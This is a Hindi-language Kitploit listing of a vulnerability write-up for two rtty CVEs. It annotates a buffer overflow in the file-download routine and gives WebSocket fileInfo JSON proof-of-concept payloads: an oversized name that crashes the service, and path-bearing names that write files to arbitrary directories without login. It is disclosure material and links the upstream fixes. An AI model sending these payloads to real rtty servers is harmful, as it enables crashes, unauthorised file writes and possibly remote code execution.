Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
rtty_CVE-2025-56708-CVE-2025-56709 — CVE-2025-56708&CVE-2025-56709 भेद्यता विवरण | Kitploit
उपकरण/GitHubGitHub/xkaneiki/rtty_cve-2025-56708-cve-2025-56709
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणगलत कॉन्फ़िगरेशनबाइनरी शोषण
GitHubxkaneiki/rtty_cve-2025-56708-cve-2025-56709

rtty_CVE-2025-56708-CVE-2025-56709

CVE-2025-56708&CVE-2025-56709 भेद्यता विवरण

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
310 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-56708&CVE-2025-56709

【CVE-2025-56709】savepath बफर ओवरफ्लो

भेद्यता अवलोकन

rtty <=v9.0.0 संस्करणों में, fileinfo विधि में एक ओवरफ्लो भेद्यता है, जो डेटा को लगातार ग्लोबल वेरिएबल savepath में लिखने का कारण बनती है, जिससे बफर ओवरफ्लो होता है।

भेद्यता विश्लेषण

savepath को बार-बार लिखा जा सकता है, जिससे ओवरफ्लो होता है

  • 【1】 यह देखा जा सकता है कि name वास्तव में savepath की मेमोरी स्पेस का उपयोग करता है
  • 【2】 यदि माउंट जाँच पास नहीं होती है, तो check_space_fail प्रवाह में प्रवेश होता है
  • 【3】 प्रवाह विफलता का कारण बनता है, लेकिन buffer_pull लगातार name (यानी savepath) स्पेस में डेटा जोड़ता रहता है
root@kitploit:~
static void start_download_file(struct file_context *ctx, struct buffer *info, int len)
{
    char *name = savepath + strlen(savepath);【1】
    struct mntent *ment;
    struct statvfs sfs;
    char buf[512];
    int fd;

    ctx->total_size = ctx->remain_size = buffer_pull_u32be(info);

    ment = find_mount_point(savepath);
    if (ment) {
        uint64_t avail;

        if (!strcmp(ment->mnt_type, "ramfs")) {
            struct sysinfo si;

            if (sysinfo(&si)) {
                log_err("download file fail: '%s'\n", strerror(errno));
                goto check_space_fail;
            }

            avail = si.freeram;
        } else if (!statvfs(ment->mnt_dir, &sfs)) {
            avail = sfs.f_bavail * sfs.f_frsize;
        } else {
            log_err("download file fail: '%s'\n", strerror(errno));
            goto check_space_fail;
        }

        if (ctx->total_size > avail) {
            log_err("download file fail: no enough space\n");
            goto check_space_fail;
        }
    } else {
        log_err("download file fail: not found mount point of '%s'\n", savepath);
        goto check_space_fail;【2】
    }

    buffer_pull(info, name, len - 4);

    if (!access(savepath, F_OK)) {
        send_file_control_msg(ctx->ctlfd, RTTY_FILE_MSG_ERR_EXIST, NULL, 0);
        log_err("the file '%s' already exists\n", name);
        goto open_fail;
    }

    fd = open(savepath, O_WRONLY | O_TRUNC | O_CREAT, 0644);
    if (fd < 0) {
        send_file_control_msg(ctx->ctlfd, RTTY_FILE_MSG_ERR, NULL, 0);
        log_err("create file '%s' fail: %s\n", name, strerror(errno));
        goto open_fail;
    }

    log_info("download file: %s, size: %u\n", savepath, ctx->total_size);

    if (fchown(fd, ctx->uid, ctx->gid) < 0)
        log_err("fchown %s fail: %s\n", savepath, strerror(errno));

    if (ctx->total_size == 0)
        close(fd);
    else
        ctx->fd = fd;

    memcpy(buf, &ctx->total_size, 4);
    strcpy(buf + 4, name);

    send_file_control_msg(ctx->ctlfd, RTTY_FILE_MSG_INFO, buf, 4 + strlen(name));

    return;

check_space_fail:
    send_file_control_msg(ctx->ctlfd, RTTY_FILE_MSG_NO_SPACE, NULL, 0);
    buffer_pull(info, name, len - 4);【3】
    
open_fail:
    file_context_reset(ctx);
}

भेद्यता PoC

  • WebSocket का उपयोग करके लगातार डेटा भेजने से सेवा क्रैश हो सकती है (यहाँ तक कि RCE भी संभव है)
root@kitploit:~
{"type":"fileInfo","name":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","size":50}

भेद्यता सुधार

https://github.com/zhaojh329/rtty/issues/139

【CVE-2025-56708】अनधिकृत फ़ाइल अपलोड

भेद्यता अवलोकन

rtty <=v9.0.0 संस्करण में निर्देशिका ट्रैवर्सल भेद्यता मौजूद है। इंटरैक्टिव प्रोटोकॉल में, fileinfo विधि में एक तार्किक भेद्यता है। हमलावर WebSocket को हाईजैक करके और fileinfo विधि को कॉल करके, बिना उपयोगकर्ता लॉगिन के, सिस्टम में किसी भी पथ पर फ़ाइल अपलोड कर सकता है।

भेद्यता PoC

  • WebSocket प्रोग्राम प्रवाह को हाईजैक करके, fileInfo विधि के माध्यम से, बिना उपयोगकर्ता लॉगिन के सिस्टम की किसी भी निर्देशिका में फ़ाइल अपलोड की जा सकती है।
  • माउंट निर्देशिका निर्दिष्ट करें
root@kitploit:~
{"type":"fileInfo","name":"home/xk/xxx/xxx/fuck1","size":50}
  • फ़ाइल निर्दिष्ट करें
root@kitploit:~
{"type":"fileInfo","name":"home/xk/xxx/xxxx/test/rtty/rtty/build/src/hello1","size":50}
  • सर्वर पर फ़ाइल उत्पन्न होती है भेद्यता आरेख

भेद्यता सुधार

https://github.com/zhaojh329/rtty/issues/140

टूल डाउनलोड करें